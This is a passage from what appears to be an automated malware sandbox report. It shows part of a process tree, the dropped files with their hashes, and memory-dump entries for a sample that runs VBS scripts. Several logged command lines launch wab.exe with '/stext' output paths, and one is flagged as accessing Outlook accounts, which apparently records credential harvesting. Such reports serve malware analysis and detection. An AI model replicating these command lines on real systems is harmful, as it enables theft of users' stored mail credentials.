                          • Suspicious behavior: EnumeratesProcesses
                          PID:1672
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mtdmpdsryr"
                          5⤵
                          • Accesses Microsoft Outlook accounts
                          PID:4628
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xvifpwdkmzsyph"
                          5⤵
                            PID:3024
                          • C:\Program Files (x86)\windows mail\wab.exe
                            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xvifpwdkmzsyph"
                            5⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3940
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jeegzjj.vbs"
                            5⤵
                              PID:1704

                    Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

                            Filesize

                            717B

                            MD5

                            822467b728b7a66b081c91795373789a

                            SHA1

                            d8f2f02e1eef62485a9feffd59ce837511749865

                            SHA256

                            af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

                            SHA512

                            bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

                            Filesize

                            192B

                            MD5

                            67ae2d124e4038b122b4892ae392c2ae

                            SHA1

                            baa2b9c20c2c94795129be4afd1074ee53b25546

                            SHA256

                            8976151356b0c1644cadf2fb3fa00d2bf277cbcfe4200118fd9d2a2089ddc997

                            SHA512

                            939bce093dab40700e827b8d1b4fe6780b007b184b09b95fe92eef07511f2c08dab3a5377f48427c7d9e3192297a04b0ef1646e6102e5fad79bfbbfbaf517706

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Filesize

                            53KB

                            MD5

                            d4d8cef58818612769a698c291ca3b37

                            SHA1

                            54e0a6e0c08723157829cea009ec4fe30bea5c50

                            SHA256

                            98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

                            SHA512

                            f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            71444def27770d9071039d005d0323b7

                            SHA1

                            cef8654e95495786ac9347494f4417819373427e

                            SHA256

                            8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

                            SHA512

                            a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

                          • C:\Users\Admin\AppData\Local\Temp\Poodle.vbs

                            Filesize

                            187KB

                            MD5

                            8cc6be5a2911ea3dc1a05c80e20ede55

                            SHA1

                            5a68267614fc4f21b949dc82def16adb1a2a7178

                            SHA256

                            7dfd8c4c8c675118ad9020c10d439d7037b6d9e8a37482f80ae821fed5b29824

                            SHA512

                            cc57268ceca2b9911b1672d18692dca2bfcb65052c8b945614f766e66ed849bf8f14aa9076f7478026144f89995c1552ac596153bde157349bcca880094a264a

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uzb1ev3z.mxy.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\czqcolh

                            Filesize

                            4KB

                            MD5

                            9c0e2939e93726f02c6d63773936b035

                            SHA1

                            98538d412084fdec0e31adbc57ccc1d1cbd6ba5b

                            SHA256

                            55d03b2840cdb4e449d9eebf11828e9220045eb181084c67f71669e5c4221707

                            SHA512

                            af500eef5d7de38bae6ce75099e7618260dfabba686cc9918064436771b95955a28f208e164cd9c1630b38467bf6f8f3de7173dfd1593a62ec5f500efbe26cb8

                          • C:\Users\Admin\AppData\Local\Temp\jeegzjj.vbs

                            Filesize

                            346B

                            MD5

                            66442ccd48f759b031f9b823384e55bc

                            SHA1

                            b23d081bdc9686e199bcd24aeccd77ccf4550dc6

                            SHA256

                            8705236d12f3890c431eef683356787b711351e8b302a2cc1fd333ecd8198355

                            SHA512

                            5fdb17e0e5f520bcaaab6a160655d608f8e5cefe49c6aa221b808d256294ae565e05f3f097c875ed716e8424c4c180418d7216014846d54a44948961169df245

                          • C:\Users\Admin\AppData\Roaming\Energierne.Bor

                            Filesize

                            455KB

                            MD5

                            a0607f4d8ebecdddbba3b17bb1eb8b8c

                            SHA1

                            e594be84d002b1ad78211854e34ba47423e9bc02

                            SHA256

                            823211deddb6c1dfbe4d5bbe5a0a8395c920dc5f1aea8f35d0b2de9d6e715db5

                            SHA512

                            39f9f1f30ed568f1d3d81af81973ce72dfc9f85b8d1b03e63b4bd56d31bb6c2935d71bf4e87a0764a74041a28b9ad27bd2a80e43498e7d08feb3aee50e3cebe1

                          • C:\Users\Admin\AppData\Roaming\belemnoidea.Fos

                            Filesize

                            519KB

                            MD5

                            9cc29e9c2f524984e4ea412888fad3ab

                            SHA1

                            a3d9571861e7f334d70d82eb0c46e10f5427358e

                            SHA256

                            6b8159ea57129f319affa7fa8ca8a74bb1e59894e7c269675df3f65b3c5e3887

                            SHA512

                            d5761c80074c464327e346f2c89daed8de0691cc7d60140648f94c3d45232c035cebde895234118480abf6cdad4e187fcfb5fdd393aace83a52df62b4a493396

                          • memory/1328-107-0x0000000008120000-0x000000000DC65000-memory.dmp

                            Filesize

                            91.3MB

                          • memory/1672-62-0x0000000000400000-0x0000000000478000-memory.dmp

                            Filesize

                            480KB

                          • memory/1672-63-0x0000000000400000-0x0000000000478000-memory.dmp

                            Filesize

                            480KB

                          • memory/1672-66-0x0000000000400000-0x0000000000478000-memory.dmp

                            Filesize

                            480KB

                          • memory/1956-21-0x0000000005280000-0x00000000052A2000-memory.dmp

                            Filesize

                            136KB

                          • memory/1956-35-0x0000000006180000-0x00000000061CC000-memory.dmp

                            Filesize

                            304KB

                          • memory/1956-39-0x0000000007390000-0x00000000073B2000-memory.dmp

                            Filesize

                            136KB

                          • memory/1956-40-0x00000000085B0000-0x0000000008B54000-memory.dmp

                            Filesize

                            5.6MB

                          • memory/1956-37-0x00000000066E0000-0x00000000066FA000-memory.dmp

                            Filesize

                            104KB

                          • memory/1956-42-0x0000000008B60000-0x000000000CAEF000-memory.dmp

                            Filesize

                            63.6MB

                          • memory/1956-36-0x0000000007980000-0x0000000007FFA000-memory.dmp

                            Filesize

                            6.5MB

                          • memory/1956-38-0x0000000007400000-0x0000000007496000-memory.dmp

                            Filesize

                            600KB

                          • memory/1956-34-0x0000000006140000-0x000000000615E000-memory.dmp

                            Filesize

                            120KB

                          • memory/1956-33-0x0000000005B60000-0x0000000005EB4000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/1956-23-0x0000000005AF0000-0x0000000005B56000-memory.dmp

                            Filesize

                            408KB

                          • memory/1956-22-0x0000000005A80000-0x0000000005AE6000-memory.dmp

                            Filesize

                            408KB

                          • memory/1956-20-0x00000000053A0000-0x00000000059C8000-memory.dmp

                            Filesize

                            6.2MB

                          • memory/1956-19-0x0000000002810000-0x0000000002846000-memory.dmp

                            Filesize

                            216KB

                          • memory/2636-115-0x0000000000880000-0x00000000063C5000-memory.dmp

                            Filesize

                            91.3MB

                          • memory/2636-131-0x0000000000880000-0x00000000063C5000-memory.dmp

                            Filesize

                            91.3MB

                          • memory/2684-53-0x00007FFADA150000-0x00007FFADAC11000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/2684-4-0x00007FFADA153000-0x00007FFADA155000-memory.dmp

                            Filesize

                            8KB

                          • memory/2684-5-0x000002355EC90000-0x000002355ECB2000-memory.dmp

                            Filesize

                            136KB

                          • memory/2684-15-0x00007FFADA150000-0x00007FFADAC11000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/2684-16-0x00007FFADA150000-0x00007FFADAC11000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/2684-43-0x00007FFADA150000-0x00007FFADAC11000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/2684-44-0x00007FFADA153000-0x00007FFADA155000-memory.dmp

                            Filesize

                            8KB

                          • memory/3940-68-0x0000000000400000-0x0000000000424000-memory.dmp

                            Filesize

                            144KB

                          • memory/3940-69-0x0000000000400000-0x0000000000424000-memory.dmp

                            Filesize

                            144KB

                          • memory/3940-73-0x0000000000400000-0x0000000000424000-memory.dmp

                            Filesize

                            144KB

                          • memory/4260-86-0x0000000006A60000-0x0000000006AAC000-memory.dmp

                            Filesize

                            304KB

                          • memory/4260-75-0x00000000063E0000-0x0000000006734000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/4324-88-0x0000000022680000-0x0000000022699000-memory.dmp

                            Filesize

                            100KB

                          • memory/4324-50-0x0000000002550000-0x00000000064DF000-memory.dmp

                            Filesize

                            63.6MB

                          • memory/4324-49-0x00000000012F0000-0x0000000002544000-memory.dmp

                            Filesize

                            18.3MB

                          • memory/4324-91-0x0000000022680000-0x0000000022699000-memory.dmp

                            Filesize

                            100KB

                          • memory/4324-92-0x0000000022680000-0x0000000022699000-memory.dmp

                            Filesize

                            100KB

                          • memory/4324-126-0x0000000002550000-0x00000000064DF000-memory.dmp

                            Filesize

                            63.6MB

                          • memory/4628-65-0x0000000000400000-0x0000000000462000-memory.dmp

                            Filesize

                            392KB

                          • memory/4628-67-0x0000000000400000-0x0000000000462000-memory.dmp

                            Filesize

                            392KB

                          • memory/4628-64-0x0000000000400000-0x0000000000462000-memory.dmp

                            Filesize

                            392KB